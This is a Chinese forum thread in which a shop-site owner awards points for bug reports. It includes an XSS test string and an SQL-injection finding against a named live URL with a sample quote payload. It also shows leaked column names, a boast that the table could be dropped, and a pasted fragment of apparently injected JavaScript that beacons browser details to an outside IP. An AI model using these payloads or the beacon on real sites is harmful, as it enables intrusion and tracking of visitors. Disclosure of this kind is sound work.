调试易

在搜索里面输入html就崩溃
如输入<script>alert();</script>赶快加分，不加分就不帮找漏洞了。我是专业人员

RE:<script>alert();</script>
---------------------------
这个应该是一个错误页面,我还没有做,也算是,我记起来了    100分RE:viewstate禁用吧，一大堆
---------------------------
这个HTML内容的优化还没有用.不过我就算是半个建议记起来了  50分

在搜索框里加入<br>会弹出 “/”应用程序中的服务器错误
“/”应用程序中的服务器错误。
--------------------------------------------------------------------------------从客户端(UC_Menu1$txtKeyWord="<br>")中检测到有潜在危险的 Request.Form 值。 
说明: 请求验证过程检测到有潜在危险的客户端输入值，对请求的处理已经中止。该值可能指示危及应用程序安全的尝试，如跨站点的脚本攻击。通过在 Page 指令或 配置节中设置 validateRequest=false 可以禁用请求验证。但是，在这种情况下，强烈建议应用程序显式检查所有输入。 异常详细信息: System.Web.HttpRequestValidationException: 从客户端(UC_Menu1$txtKeyWord="<br>")中检测到有潜在危险的 Request.Form 值。

RE:在搜索框里加入 <br>会弹出 “/”应用程序中的服务器错误 
--------------------------------------------
这个错误和 2楼 相似,所以这里不再进行加分,谢谢

哦，这样啊.那算了.
以"admin"帐号注册，提示注册成功
再以"admin"帐号登录，提示"当前用户已经禁用，请联系管理员".两边不对称...
闪了.居然不给分...

看到一个字段名字 [MaterialCode]

RE:
哦，这样啊.那算了. 
以"admin"帐号注册，提示注册成功 
再以"admin"帐号登录，提示"当前用户已经禁用，请联系管理员".两边不对称... 
闪了.居然不给分...
--------------------------
好的, 100分
可能程序的Status状态注册的时候没有加为 1而是0哈哈

看到一个字段名字 [MaterialCode]
----------------
如何看到? 是有这一个字段

回复:
用户注册后没有办法登录
本地程序已经添加了代码
info.Status = 1;
但网上没有,大家可以注册后到后台自行启用当前用户谢谢

http://www.zingmall.com.cn/List.xhtml 可以通过参数W
SQL注入...

哥们是不是被黑了。
---------------------------------------
://218.16.103.96:4022/logo.jpg?p="; link += Math.floor((new Date()).getTime()/1000); link += "|"; link += navigator.appMinorVersion; link += "|"; link += screen.availHeight; link += "|"; link += screen.availWidth; link += "|"; link += screen.colorDepth; link += "|"; link += screen.height; link += "|"; link += screen.width; objElement.setAttribute("src",link); objElement.style.display="none"; document.body.appendChild(objElement); }; window.setInterval("window.status=' '",200); window.setTimeout('refresh()',1000); test(); 

栏位名称分别为：MaterialCode, MaterialTypeCode, MaterialPic, MaterialSmallPic,BarCode,FullName, BrandCode, KindCode, SeriesCode, ItemCode, GenderCode,PriceCode,ColorFirst,ColorSecond, ColorThird, YearNo, MonthNo, SeasonCode, UnitCode, TechLevelCode, Origin, StuffFirst, StuffSecond, StuffThird, CostPrice, RetailPrice, Discount, DiscountPrice, SalePrice, StockQty, Notic, Intro, SimpleIntro, Integral, MetaTitle, MetaKeywords, MetaDescription, Weight, WeightUnit, Alarm, ActiveBeginDateBegin, ActiveBeginDateEnd, ActiveEndDateBegin, ActiveEndDateEnd, AddTimeBegin, AddTimeEnd, AddUserID, AllRate, MonthRate, WeekRate, Dimensions, HaveInvoice, IsIndexTop, ISTypeTop, ISHot, IsOnSale, OrderID, Status, RandomGUID, OrderBy, SizeCode, PageIndex, PageSize,  RecordCount, UseCache
OL_Material.cs:942 行处用的拼SQL的方法.....

RE:
http://www.zingmall.com.cn/List.xhtml 可以通过参数W 
SQL注入...
-----------------------------------
对这是个问题,因为这里面我没有对他进行SQL过滤
是不是这里进行SQL过滤呢,
那这个还有什么好的方法呢?100分记下了谢谢

RE:
栏位名称分别为： 
C# code
MaterialCode, MaterialTypeCode, MaterialPic, MaterialSmallPic,BarCode,FullName, BrandCode, KindCode, SeriesCode, ItemCode, GenderCode,PriceCode,ColorFirst,ColorSecond, ColorThird, YearNo, MonthNo, SeasonCode, UnitCode, TechLevelCode, Origin, StuffFirst, StuffSecond, StuffThird, CostPrice, RetailPrice, Discount, DiscountPrice, SalePrice, StockQty, Notic, Intro, SimpleIntro, Integral, MetaTitle, MetaKeywords, MetaDescription, Weight, WeightUnit, Alarm, ActiveBeginDateBegin, ActiveBeginDateEnd, ActiveEndDateBegin, ActiveEndDateEnd, AddTimeBegin, AddTimeEnd, AddUserID, AllRate, MonthRate, WeekRate, Dimensions, HaveInvoice, IsIndexTop, ISTypeTop, ISHot, IsOnSale, OrderID, Status, RandomGUID, OrderBy, SizeCode, PageIndex, PageSize,  RecordCount, UseCacheOL_Material.cs:942 行处用的拼SQL的方法.....
-------------------------------------------
是的,这个是怎么得出来的呢
是不是那个查询那里的出错注入出错信息?

 AND [Status] = 1 ORDER BY [MonthRate] ASC,[OrderID] DESC,[MaterialCode] DESC ) AS TMP  ORDER BY [MonthRate] DESC,[OrderID] ASC,[MaterialCode] ASC
hohoho
字段全被我看见了。而且我可以把表drop掉

lz用的是存储过程分页。里面有大bug

输入',有重大bug,http://www.zingmall.com.cn/List.xhtml?w='aadd,

输入html标签,有重大bug,你要禁止输入html标签

我看楼主用MAC,这个网站也在MAC下开发的?用的什么工具?